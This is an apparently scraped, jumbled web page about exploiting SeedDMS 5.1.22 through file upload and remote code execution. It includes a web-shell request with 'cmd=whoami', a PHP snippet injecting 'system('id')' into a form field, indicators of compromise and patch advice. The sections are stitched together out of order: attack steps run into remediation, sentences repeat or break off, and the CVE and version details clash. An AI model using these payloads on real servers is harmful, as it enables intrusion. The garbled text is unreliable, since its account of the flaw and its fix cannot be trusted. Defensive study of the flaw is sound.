Seeddms 5.1.22 - Exploit

One of the most notable reports regarding SeedDMS 5.1.22 involves a comprehensive penetration test that chain-exploited multiple vulnerabilities to achieve full system takeover.

Access the file via your browser or curl:http://[target]/seeddms/data/1048576/24/1.php?cmd=whoami 🛡️ Remediation and Fixes seeddms 5.1.22 exploit

Indicators of compromise

  • Unexpected files in web directories with double extensions (e.g., .php.jpg, .php.txt) or with traversal sequences.
  • New user accounts or documents with odd metadata values.
  • Web server logs showing POSTs to upload endpoints with multipart boundaries and unusual filename fields.
  • Server-side error logs referencing file move/rename failures or permission changes.

Vulnerability Type: Unrestricted File Upload / Remote Code Execution (RCE) CVE Reference: CVE-2019-12744 Affected Version: SeeddMS 5.1.22 and earlier One of the most notable reports regarding SeedDMS 5

If you're studying this version for a legitimate security test (e.g., CTF, audit, or research), I recommend: Unexpected files in web directories with double extensions

Step 5: Gaining Code Execution

Once the shell's URL is confirmed:

  1. Update to the latest version: SeedDMS 6.0.3 or later, which includes patches for this vulnerability.
  2. Restrict file uploads: Limit file uploads to trusted users and validate file types.
  3. Implement a Web Application Firewall (WAF): A WAF can help detect and block suspicious traffic.
  4. Monitor your system: Regularly check your system's logs and performance for signs of malicious activity.
<?php
$url = 'http://<target_host>/seeddms/out.php';
$data = array(
    'folder' => 'system(\'id\')',
    'id' => '1'
);

Part 1: The Vulnerability – Anatomy of the Flaw


The Core Issue: addfile.php & Improper Session Enforcement


In properly secured versions of SeedDMS, uploading a document requires:
Scroll to Top